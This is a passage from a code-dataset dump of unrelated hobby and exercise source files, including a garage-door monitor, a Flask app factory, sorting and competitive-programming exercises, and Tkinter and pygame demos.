self._get_file(self.history[0],\n 'work/logs/commit-message.txt')\n\n self.assertEqual(obtained_message, expected_message)\n\n def test_jinja2_message_brackets(self):\n self._jinja2_message(\"This message has {{ jinja2 }} in it \")\n\n def test_jinja2_message_raw(self):\n self._jinja2_message(\"This message has {% raw %} in {% endraw %} it \")\n\n\nclass TestWindowsInventory(TestInventoryBase):\n config_file = 'zuul-winrm.conf'\n\n def test_windows_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n windows_host = inventory['all']['hosts']['windows']\n self.assertEqual(windows_host['ansible_connection'], 'winrm')\n self.assertEqual(\n windows_host['ansible_winrm_operation_timeout_sec'],\n '120')\n self.assertEqual(\n windows_host['ansible_winrm_read_timeout_sec'],\n '180')\n\n self.executor_server.release()\n self.waitUntilSettled()\n","sub_path":"tests/unit/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"172726745","text":"\n\"\"\" https://stackoverflow.com/questions/36636185/is-it-possible-for-python-to-display-latex-in-real-time-in-a-text-box \"\"\"\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nmatplotlib.use('TkAgg')\n\nfrom Tkinter import *\nfrom ttk import *\n\ndef graph(text):\n tmptext = entry.get()\n if tmptext == \"\":\n tmptext = \"waiting\\bfor\\binput\"\n tmptext = \"$\"+tmptext+\"$\"\n\n ax.clear()\n ax.text(0.2, 0.6, tmptext, fontsize = 20) \n canvas.draw()\n\n\nroot = Tk()\n\nmainframe = Frame(root)\nmainframe.pack()\n\ntext = StringVar()\nentry = Entry(mainframe, width=100, 
textvariable=text)\nentry.pack()\n\nlabel = Label(mainframe)\nlabel.pack()\n\nfig = matplotlib.figure.Figure(figsize=(4, 2), dpi=200)\nax = fig.add_subplot(111)\n\ncanvas = FigureCanvasTkAgg(fig, master=label)\ncanvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)\ncanvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1)\n\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_visible(False)\n\n\n#Greek\ndef alpha(): \n entry.insert('insert', 'α')\ndef Beta(): \n entry.insert('insert', 'β')\ndef Gamma(): \n entry.insert('insert', 'γ')\ndef Delta(): \n entry.insert('insert', 'δ')\ndef Epsilon(): \n entry.insert('insert', 'ε')\ndef Theta(): \n entry.insert('insert', 'θ')\ndef Kappa(): \n entry.insert('insert', 'κ')\ndef Lambda(): \n entry.insert('insert', 'λ')\ndef Mu(): \n entry.insert('insert', 'μ')\ndef Xi(): \n entry.insert('insert', 'ξ')\ndef Pi(): \n entry.insert('insert', 'π')\ndef Rho(): \n entry.insert('insert', 'ρ')\ndef Sigma(): \n entry.insert('insert', 'σ')\ndef Tau(): \n entry.insert('insert', 'τ')\ndef Phi(): \n entry.insert('insert', 'φ')\ndef Chi(): \n entry.insert('insert', 'χ')\ndef Psi(): \n entry.insert('insert', 'ψ')\ndef Omega(): \n entry.insert('insert', 'ω')\n\nwid=30\nhei=30\n# Greek\nbtn_alpha = Button(root,text = 'α',command = alpha)\nbtn_alpha.place(x = 0,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'β',command = Beta)\nbtn_alpha.place(x = 0+wid*1,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'γ',command = Gamma)\nbtn_alpha.place(x = 0+wid*2,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'δ',command = Delta)\nbtn_alpha.place(x = 0+wid*3,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ε',command = Epsilon)\nbtn_alpha.place(x = 0+wid*4,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'θ',command = Theta)\nbtn_alpha.place(x = 0+wid*5,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'κ',command = Kappa)\nbtn_alpha.place(x = 0+wid*6,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'λ',command = Lambda)\nbtn_alpha.place(x = 0+wid*7,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'μ',command = Mu)\nbtn_alpha.place(x = 0+wid*8,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ξ',command = Xi)\nbtn_alpha.place(x = 0+wid*0,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'π',command = Pi)\nbtn_alpha.place(x = 0+wid*1,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ρ',command = Rho)\nbtn_alpha.place(x = 0+wid*2,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'σ',command = Sigma)\nbtn_alpha.place(x = 0+wid*3,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'τ',command = Tau)\nbtn_alpha.place(x = 0+wid*4,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'φ',command = Phi)\nbtn_alpha.place(x = 0+wid*5,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'χ',command = Chi)\nbtn_alpha.place(x = 0+wid*6,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ψ',command = Psi)\nbtn_alpha.place(x = 0+wid*7,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ω',command = Omega)\nbtn_alpha.place(x = 0+wid*8,y = 350+hei*1,width = wid,height = hei)\n\n\n\n\n# function\ndef xa(): \n entry.insert('insert', '^{U}')\ndef xab(): \n entry.insert('insert', '_{L}^{U}')\ndef ppx(): \n entry.insert('insert', ' \\frac{\\partial ?}{\\partial x}')\ndef p2px2(): \n 
entry.insert('insert', ' \\frac{\\partial^2 ?}{\\partial x^2}')\ndef ddx(): \n entry.insert('insert', ' \\frac{\\mathrm{d} ?}{\\mathrm{d} x}')\ndef inte(): \n entry.insert('insert', '\\int ?')\ndef inteab(): \n entry.insert('insert', '\\int_{L}^{U}')\n\nbtn_xa = Button(root,text = 'x^(a)',command = xa)\nbtn_xa.place(x = 0+wid*10,y = 350,width = wid,height = hei)\nbtn_xab = Button(root,text = 'x_(a)^(b)',command = xab)\nbtn_xab.place(x = 0+wid*11,y = 350,width = wid*2,height = hei)\nbtn_ppx = Button(root,text = 'p/px',command = ppx)\nbtn_ppx.place(x = 0+wid*13,y = 350,width = wid*2,height = hei)\nbtn_ddx = Button(root,text = 'd/dx',command = ddx)\nbtn_ddx.place(x = 0+wid*15,y = 350,width = wid,height = hei)\nbtn_inte = Button(root,text = 'integral',command = inte)\nbtn_inte.place(x = 0+wid*16,y = 350,width = wid*2,height = hei)\nbtn_inteab = Button(root,text = 'integralab',command = inteab)\nbtn_inteab.place(x = 0+wid*10,y = 350+hei,width = wid*2,height = hei)\n\n\n# bind every keypress so the rendered LaTeX refreshes as the user types\nroot.bind('<Key>', graph)\nroot.mainloop()","sub_path":"latexmath/latex_mat_v2.py","file_name":"latex_mat_v2.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"456568898","text":"'''\nN : a natural number\nK : a number N can be divided by\n1. Subtract 1 from N.\n2. Divide N by K.\n\nThe task: choose between these two operations so that N becomes 1 in the fewest possible operations.\n'''\n\nn, k = map(int, input().split())\nresult = 0\nwhile n >= k:\n result += n % k # subtract 1 until n is divisible by k\n n -= n % k\n result += 1 # one division by k\n n //= k\nresult += n - 1 # subtract the rest of the way down to 1\nprint(result)\n","sub_path":"이것이 취업을 위한 코딩테스트다 with 파이썬/1. 그리디 알고리즘/[099p - 2회독]1이 될 때까지 - 그리디.py","file_name":"[099p - 2회독]1이 될 때까지 - 그리디.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"618200473","text":"from tornado.web import Application\nfrom tornado.options import options, define\nfrom kazoo.client import KazooClient\n\ndefine('port', default=8080, help=\"listen port.\")\ndefine('bind', default='0.0.0.0', help=\"bind address\")\ndefine('zkroot', default='/cmdb/lock', help=\"zookeeper node of cmdb root.\")\ndefine('zkHosts', default='127.0.0.1:2181', help='zookeeper server.')\n\n\ndef make_app(router, **settings):\n app = Application(router, settings)\n zk = KazooClient(options.zkHosts)\n setattr(app, 'zk', zk)\n return app\n","sub_path":"cmdb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"443780390","text":"from functools import reduce\nN = input() # try the join function; a multiple of 30 must end in 0 and have a digit sum divisible by 3\nL = list(str(N)) # an input of 999 is split into ['9','9','9']\na = 10**(len(L)-1)\nL = sorted(L,reverse=True) # sort in descending order, since we want the largest number\ns = reduce(lambda x,y : int(x)+int(y),L) # add every element of the list into a single value\n\nif L[-1] != \"0\" or s%3!=0 :\n print(-1)\nelse :\n print(int(\"\".join(L))) # join the list elements into one string, then cast to int\n\n\n# N = input() # solved with ints instead of join\n# L = list(map(int,str(N)))\n# l = len(L)\n# a = 10**(l-1)\n# L = sorted(L,reverse=True)\n# if L[-1] != 0 :\n# print(-1)\n# else :\n# result = 0\n# for i in range(l):\n# result += L[i]*a\n# a//=10\n# print(result)\n\n\n# import itertools # exceeded the memory limit\n# N = input()\n# L = list(map(int,str(N)))\n# a = 10**(len(L)-1)\n# P = list(itertools.permutations(L))\n# result = -1\n\n# for i in range(len(P)):\n# tmp = 0\n# b = a\n# for j in range(len(P[i])):\n# tmp += P[i][j]*(b)\n# b//=10\n# if tmp%30 == 0 :\n# result = max(result,tmp)\n# print(result)\n
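# (note: list(itertools.permutations(L)) materialises all n! orderings of the digits at once, which is why this commented-out version exceeded the memory limit)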
","sub_path":"2020_spring/2020_04_01/10610_JH.py","file_name":"10610_JH.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"125301942","text":"#!/usr/bin/python\n\n#\n# This Python script is used to monitor the status of a garage door and\n# report open and close events to a smartphone via slack IOT events.\n#\n# A Raspberry Pi model 3 or 3+ and a HC-SR05 ultrasonic distance sensor and a\n# handful of parts are required.\n#\n# Enhanced to send HTTP POST requests with the current garage door status to a\n# Particle Photon. The Photon will allow a person (via an app) to close the\n# garage door remotely. The Photon requires the current status of the garage\n# door so it can prevent a person from opening the door.\n\n# Import required standard libraries.\nfrom __future__ import print_function\nimport argparse\nimport math\nimport os\nimport requests\nimport RPi.GPIO as GPIO\nimport time\n\n# Import required libraries.\nimport gd_closer_credentials\nimport journal\nimport sensor\nimport slack\n\n# Define the Raspberry Pi GPIO pins for the sensor and LED.\nGPIO_TRIGGER = 25\nGPIO_ECHO = 24\nGPIO_STATUS_LED = 21\n\n# Define the loggers and log files that will be used to\n# record activities and when the program has started. A separate\n# log is used to make it easy to see how often the program is\n# restarted due to fatal errors.\nGDOOR_ACTIVITY_LOGGER = \"activity\"\nGDOOR_STARTUP_LOGGER = \"startup\"\nGDOOR_ACTIVITY_LOG_FILE = \"gdoor-activity.log\"\nGDOOR_STARTUP_LOG_FILE = \"gdoor-startup.log\"\n\n# Define the door states.\nDOOR_OPEN = \"open\"\nDOOR_CLOSED = \"closed\"\n\n# Define the messages that will be sent via Slack.\nDOOR_OPENED_MESSAGE = \"Garage door just opened!\"\nDOOR_CLOSED_MESSAGE = \"Garage door just closed!\"\nDOOR_OPEN_WARNING_MESSAGE = \"Garage door has been open more than {} minutes\"\n\n# If SLACK_DEBUG is set to True messages will not be sent to slack.\nSLACK_DEBUG = False\n\n# Slack message successfully sent\nSLACK_SUCCESS = 200\n\n# Garage door closing device status update commands\nGD_CLOSER_CLOSED = \"setgdclosed\"\nGD_CLOSER_OPEN = \"setgdopen\"\n\n\ndef post_gdoor_status(status):\n \"\"\"\n Send an HTTPS POST to a Particle Photon microcontroller attached to the Particle Cloud.\n The Photon keeps track of the garage door status and via an app will allow a person to\n close the garage door. The Photon will only allow the garage door to be closed (not opened)\n and to enforce that requires up-to-date status of whether the garage door is currently open\n or closed. A string with the status of the POST request is returned from this function.\n \"\"\"\n\n GD_CLOSER_SOURCE = \"gdmonitor\" # used to indicate where the POST command came from\n\n # Define the parameters that will be sent in the POST request\n headers = { 'Authorization' : 'Bearer ' + gd_closer_credentials.GD_CLOSER_BEARER }\n data = { 'arg' : GD_CLOSER_SOURCE }\n url = 'https://api.particle.io/v1/devices/' + gd_closer_credentials.GD_CLOSER_DEVICE + '/' + status\n\n # Attempt to send the POST request. 
Failure will not stop the monitor program.\n try:\n response = requests.post(url, headers=headers, data=data)\n return \"POST to gdcloser with status={} was successful\".format(status)\n except requests.exceptions.RequestException as err:\n return \"POST to gdcloser Request failed with error: {}\".format(err)\n except Exception as err:\n return \"POST to gdcloser failed with an unexpected error: {}\".format(err)\n \n\ndef get_average_measurement(distance_sensor,\n num_measurements,\n delay,\n door_log,\n ):\n \"\"\"\n Collect a set of measurements and return the average measurement.\n \"\"\"\n\n measurement = 0.0\n for n in range(num_measurements):\n\n distance_measurement, echo_counter = distance_sensor.get_measurement()\n measurement += distance_measurement\n\n logmsg = \"Measurement: {} Sensor measurement: {} Echo counter: {}\".format(n, distance_measurement, echo_counter)\n door_log.debug(logmsg)\n\n time.sleep(delay)\n\n average_measurement = measurement / num_measurements\n return average_measurement\n\n\ndef monitor_door(trigger_pin,\n echo_pin,\n led_status_pin,\n measurements,\n time_between_indiv_measurements,\n time_between_avg_measurements,\n open_threshold,\n warning_threshold,\n door_log,\n ):\n\n \"\"\"\n Use the sensor to monitor the status of the door and\n send slack messages when the door state changes. Also\n report via slack if the door is opened a prolonged period of time.\n \"\"\"\n\n # Record the start of execution.\n door_log.information(\"Door Monitoring Started\")\n\n # Setup for sending slack messages\n slack_iot = slack.Iot(debug=SLACK_DEBUG)\n\n # Initialize the utltrasonic distance sensor.\n distance_sensor = sensor.DistanceSensor(trigger_pin,\n echo_pin,\n led_status_pin,\n 0.05,\n DOOR_OPEN,\n DOOR_CLOSED,\n )\n\n # Keep track of the number of times measurements are taken\n iteration = -1\n\n # First time through assume door is closed.\n door_previous_status = DOOR_CLOSED\n door_status = DOOR_CLOSED\n last_warning = 0\n\n while True:\n\n iteration += 1\n\n door_log.debug(\"------- Entering iteration {:,} -------\".format(iteration))\n door_log.information(\"Checking door status ({:,})\".format(iteration))\n\n # Take the specified number of measurements and calculate the average.\n\n elapsed = get_average_measurement(distance_sensor,\n measurements,\n time_between_indiv_measurements,\n door_log,\n )\n\n door_log.debug(\"{:,} Average measurement: {}\".format(iteration, elapsed))\n\n # Calculate the distance in centimeters\n distance = distance_sensor.calculate_distance(elapsed)\n\n door_log.debug(\"{:,} Distance: {:5.1f} cm\".format(iteration, distance))\n\n # Determine what the current state of the door is by\n # comparing the distance to the number of centimeters above the\n # door is considered open\n\n if distance < open_threshold:\n door_status = DOOR_OPEN\n else:\n door_status = DOOR_CLOSED\n\n door_log.information(\"{:,} Door is currently {}\".format(iteration, door_status))\n\n # Check to see if the state of the door has changed.\n if door_status != door_previous_status:\n\n # The state of the door has changed.\n # Determine what happened.\n\n door_log.information(\"{:,} Door State Change: New Distance: {:5.1f}\".format(iteration, distance))\n\n if door_status == DOOR_OPEN:\n\n # Log that the door has opened; set the LED to\n # indicate that the door is open; send a message\n # via slack saying the door is open.\n\n door_previous_status = DOOR_OPEN\n door_log.information(DOOR_OPENED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_OPEN)\n # Don't 
send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_OPENED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Opened notification\")\n\n # Record the time that door was opened.\n opened_time = time.time()\n\n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_OPEN))\n\n else:\n # Log that the door has closed; set the LED to\n # indicate that the door is closed; send a message\n # via slack saying the door is closed.\n\n door_previous_status = DOOR_CLOSED\n door_log.information(DOOR_CLOSED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_CLOSED)\n \n # Don't send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_CLOSED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Closed notification\")\n \n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_CLOSED))\n\n # If the door is closed, blink the LED briefly. This blinking\n # is like what happens on smoke detectors and is done to indicate\n # that the sensor and Raspberry Pi are alive and well.\n if door_status == DOOR_CLOSED:\n distance_sensor.blink_led()\n\n # If the door is open, calculate how long it's been open, and periodically\n # send slack messages warning that the door has been opened for a prolonged\n # period of time.\n\n if door_status == DOOR_OPEN:\n elapsed_open_time_mins = (time.time() - opened_time) / 60.0\n door_log.information(\"{:,} Open door elapsed time is {:06.2f} minutes\".format(iteration, elapsed_open_time_mins))\n elapsed_open_time_mins = int(elapsed_open_time_mins)\n #### print(\"elapsed_open_time_mins {} last_warning {}\".format(elapsed_open_time_mins, last_warning))\n\n # Send the lack message if the door has been opened for a multiple of\n # 'warning_threshold' minutes.\n\n if ((elapsed_open_time_mins > 0 ) and\n (elapsed_open_time_mins % warning_threshold) == 0):\n #### print(\"elapsed_open_time {} warning_threshold {}\".format(elapsed_open_time_mins, warning_threshold))\n\n # Make sure only one message is sent per 'warning_threshold' multiple.\n if elapsed_open_time_mins != last_warning:\n open_warning_message = DOOR_OPEN_WARNING_MESSAGE.format(elapsed_open_time_mins)\n door_log.warning(open_warning_message)\n slack_iot.post_message(open_warning_message)\n last_warning = elapsed_open_time_mins\n\n # Sleep until time to take the next set of measurements.\n door_log.debug(\"{:,} Sleeping for {} seconds\".format(iteration, time_between_avg_measurements))\n time.sleep(time_between_avg_measurements)\n door_log.debug(\"{:,} Awoken from sleep\".format(iteration))\n\n\n#\n# This is the main processing where the command line arguments are\n# parsed and the monitoring function is called.\n#\n\ndef main():\n\n program_name = os.path.basename(__file__)\n door_log = journal.Journal(GDOOR_ACTIVITY_LOGGER,\n GDOOR_ACTIVITY_LOG_FILE,\n program_name)\n\n startup_log = journal.Journal(GDOOR_STARTUP_LOGGER,\n GDOOR_STARTUP_LOG_FILE,\n program_name)\n\n startup_log.information(\"Garage door monitor started.\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--checkstatus\",\n type=float,\n default=1.0,\n help=\"delay in minutes between checking door status\",\n )\n parser.add_argument(\"-i\",\n \"--individual\",\n type=float,\n default=0.5,\n help=\"delay in 
seconds between taking individual measurements\",\n )\n parser.add_argument(\"-m\",\n \"--measurements\",\n type=int,\n default=3,\n help=\"number of measurements for averaging\",\n )\n parser.add_argument(\"-o\",\n \"--open\",\n type=int,\n default=50,\n help=\"number of cm above the door is considered open\",\n )\n parser.add_argument(\"-w\",\n \"--warning\",\n type=int,\n default=30,\n help=\"display warnings when the door is open more than this many minutes\",\n )\n parser.add_argument(\"-d\",\n \"--debug\",\n action='store_true',\n help=\"print and log debugging messages\",\n )\n\n args = parser.parse_args()\n\n msg = \"Each average will use {} measurements.\".format(args.measurements)\n door_log.information(msg)\n\n msg = \"There will be {} seconds delay between individual measurements.\".format(args.individual)\n door_log.information(msg)\n\n msg = \"There will be {} minutes ({} seconds) delay between checking the door's status.\".format(args.checkstatus, args.checkstatus*60)\n door_log.information(msg)\n\n msg = \"Door is considered open if sensor reading is less than {}\".format(args.open)\n door_log.information(msg)\n\n msg = \"Warnings will be sent every {} minutes while the door is open\".format(args.warning)\n door_log.information(msg)\n\n # Set whether debug messages are printed and logged based on \n # what was specified on the command.\n door_log.log_debug = args.debug\n\n # Convert the time between taking averaged measurements from\n # minutes to seconds.\n checkstatus = 60 * args.checkstatus\n\n monitor_door(GPIO_TRIGGER,\n GPIO_ECHO,\n GPIO_STATUS_LED,\n args.measurements,\n args.individual,\n checkstatus,\n args.open,\n args.warning,\n door_log,\n )\n\n door_log.debug(\"Exiting...\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"garage-monitor.py","file_name":"garage-monitor.py","file_ext":"py","file_size_in_byte":14153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"120491191","text":"import json\nfrom logging.config import dictConfig as loadLogginConfig\nfrom pydantic import ValidationError\nfrom email_validator import EmailNotValidError\nfrom flask import Flask\nfrom flask_cors import CORS\n#\nfrom social_network.errors import ApplicationError\nfrom social_network.database import Database\nfrom social_network.settings import Config\n\n\n__all__ = [\"create_application\"]\n\n\ndb = Database()\n\n\ndef create_application():\n app = Flask(\"social_network\")\n app.config.from_object(Config)\n\n CORS(app)\n db.init_app(app)\n\n setup_logging(app)\n register_error_handlers(app)\n register_blueprints(app)\n\n return app\n\n\ndef setup_logging(app):\n with open(app.config[\"LOGGING_SETTINGS\"], \"r\") as f:\n loadLogginConfig(json.load(f))\n\n\ndef register_blueprints(app):\n from social_network.blueprints import auth_blueprint\n from social_network.blueprints import posts_blueprint\n from social_network.blueprints import users_blueprint\n from social_network.blueprints import analytics_blueprint\n\n app.register_blueprint(auth_blueprint)\n app.register_blueprint(posts_blueprint)\n app.register_blueprint(users_blueprint)\n app.register_blueprint(analytics_blueprint)\n\n\ndef register_error_handlers(app):\n\n def _handle_error(error):\n reason_tmp = getattr(error, \"description\", \"Internal error\")\n code_tmp = getattr(error, \"code\", 500)\n details_tmp = getattr(error, \"details\", [])\n\n reason = reason_tmp if isinstance(reason_tmp, str) else \"Internal error\"\n code = int(code_tmp) if 
isinstance(code_tmp, int) else 500\n details = details_tmp if isinstance(details_tmp, (list, tuple)) else []\n\n return {\n \"status\": \"error\",\n \"reason\": reason,\n \"details\": details\n }, code\n\n def default_handler(error):\n app.logger.exception(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n\n\n def application_error_handler(error):\n app.logger.error(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n \n def validation_error_handler(error):\n app.logger.info(f\"Invalid input:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Incorrect input\",\n \"details\": error.errors()\n }, 400\n\n def invalid_email_error_handler(error):\n app.logger.info(f\"Invalid Email:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Email is not valid\",\n \"details\": []\n }, 400\n \n app.register_error_handler(Exception, default_handler)\n app.register_error_handler(ValidationError, validation_error_handler)\n app.register_error_handler(ApplicationError, application_error_handler)\n app.register_error_handler(EmailNotValidError, invalid_email_error_handler)\n","sub_path":"src/social_network/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"446459039","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 11:07:36 2018\n\n@author: ENFIUEMS02\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\n\n# CREATING A 2D GRID GRAPH\n\nN = 2\n\nG=nx.grid_2d_graph(N,N) # NxN grid\n\nfor i in range(N):\n for j in range(N):\n G.nodes[(i,j)]['position']=[i,j]\n\npos=nx.get_node_attributes(G,'position')\n\nnx.draw(G, pos, with_labels=True)\n#plt.gca().invert_xaxis\n#plt.gca().invert_yaxis\nplt.axis('on')\nplt.show()\n\nprint(nx.info(G))\n\nprint(\"Vertices:\")\n\nfor i in G.nodes():\n print(i, \"position= \", G.node(data='position')[i])\n","sub_path":"paper_netx_texture_v4.py","file_name":"paper_netx_texture_v4.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"620911124","text":"def insertionsort(a):\r\n for i in range(len(a)):\r\n temp = a[i]\r\n k = i\r\n while k > 0 and temp < a[k - 1]:\r\n a[k] = a[k - 1]\r\n k -= 1\r\n a[k] = temp\r\n\r\ndef bucketsort(a):\r\n b=[]\r\n n=len(a)\r\n for i in range(1,11):\r\n l=[]\r\n b.append(l)\r\n x=max(a)\r\n d=0.1\r\n\r\n while x>0:\r\n x=int(x/10)\r\n d=d*10\r\n \r\n for i in range(n):\r\n j=int(a[i]/d)\r\n b[j].append(a[i])\r\n\r\n # sort all ten buckets (the old range(1,11) skipped bucket 0 and hid the b[10] IndexError in a bare except)\r\n for i in range(10):\r\n insertionsort(b[i])\r\n l=[] \r\n for i in b :\r\n for j in i :\r\n l.append(j)\r\n print(l)\r\n \r\ns = input(\"Enter the numbers\")\r\na=list(map(int, s.split()))\r\nbucketsort(a)\r\n","sub_path":"Sorting/bucketsort.py","file_name":"bucketsort.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"523444740","text":"nn = input().split()\nn = int(nn[0])\nl = int(nn[1])\nr = int(nn[2])\n#s = [n]\n'''\nwhile True:\n\tla = True\n\tfor i in range(len(s)):\n\n\t\tif s[i] > 1:\n\t\t\ts = s[:i]+[int(s[i]/2),s[i]%2, int(s[i]/2)]+s[i+1:]\n\t\t\tla = False\n\tif la:\n\t\tbreak\n\ndef f(w):\n\tif w == 1:\n\t\treturn [1]\n\tif w == 0:\n\t\treturn[0]\n\ta = f(int(w/2))\n\treturn a + [w%2] + a\n'''\nlis = []\n
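# record the bits of n from least to most significant (the loop stops before the leading 1)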
while n > 1:\n\tif n%2:\n\t\tlis.append(1)\n\telse:\n\t\tlis.append(0)\n\tn = int(n/2)\nlis = lis[::-1]\nllis = len(lis)\ncount = 0\nfor i in range(l,r+1):\n\tif i % 2:\n\t\t#print(i)\n\t\tcount += 1\n\telse:\n\t\tfor j in range(llis):\n\t\t\tif i - 2**(j +1) <0:\n\t\t\t\t#print(i - 2**(j +1))\n\t\t\t\tbreak\n\t\t\tif (i-2**(j +1))%(2**(j+2)) == 0:\n\t\t\t\t#print(2**(j +1))\n\t\t\t\tcount += lis[j]\n\n\nprint(count)","sub_path":"Codeforces/399d2B.py","file_name":"399d2B.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"389514879","text":"\"\"\"\r\nDesafio089 - Write a program that reads the name and two grades of several students\r\nand stores everything in a composite list. At the end, show a report containing each\r\nstudent's average, and let the user display each student's grades individually.\r\n\"\"\"\r\nalunos = []\r\nwhile True:\r\n nome = input('Name: ')\r\n n1 = float(input('Grade 1: '))\r\n n2 = float(input('Grade 2: '))\r\n media = (n1 + n2) / 2 \r\n alunos.append( [nome, [n1, n2], media] )\r\n sair = input('Do you want to quit? [Y/N] ')\r\n if sair in 'yY':\r\n break\r\n\r\nprint('-='*30)\r\n\r\nprint(f'{\"No.\":<4}{\"NAME\":<10}{\"AVERAGE\":>8}')\r\nprint('-'*30)\r\n\r\nfor i,a in enumerate(alunos):\r\n\tprint('{:<4}{:<10}{:>8.1f}'.format(i,a[0],a[2]))\r\n\r\nprint('-'*30)\r\nwhile True:\r\n try:\r\n op = int(input('Show the grades of which student above?\\nEnter the number or 999 to quit: '))\r\n if op == 999:\r\n print('Quitting...')\r\n break\r\n elif op <= len(alunos):\r\n print('-'*30)\r\n print('The grades of {} are {}'.format(alunos[op][0], alunos[op][1]))\r\n print('-'*30)\r\n except IndexError:\r\n print('There is no student with this number!')\r\n print('-'*30)","sub_path":"Desafio089.py","file_name":"Desafio089.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"488430098","text":"#!/usr/bin/python3.4\n\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\n\n# Open the Pygame window\nfenetre = pygame.display.set_mode((640, 480))\n\n# Load and blit the background\nfond = pygame.image.load(\"background.jpg\").convert()\nfenetre.blit(fond, (0,0))\n\n# Load and blit the character\nperso = pygame.image.load(\"perso.png\").convert_alpha()\nposition_perso = perso.get_rect()\nfenetre.blit(perso, (200,300))\n\n# Refresh the screen\npygame.display.flip()\n\n# The loop keeps running while this is 1 and stops when it is 0\ncontinuer = 1\n\n\npygame.key.set_repeat(400, 30)\n# Main loop\nwhile continuer:\n for event in pygame.event.get(): # Walk through the list of all received events\n if event.type == QUIT: # If one of these events is of type QUIT\n continuer = 0 # Stop the loop\n if event.type == KEYDOWN:\n if event.key == K_DOWN: # If the down arrow key is pressed\n # Move the character down\n position_perso = position_perso.move(0,3)\n \n # Blit again\n fenetre.blit(fond, (0,0)) \n fenetre.blit(perso, position_perso)\n # Refresh\n pygame.display.flip()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"612369520","text":"import numpy as np\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import Embedding\nfrom 
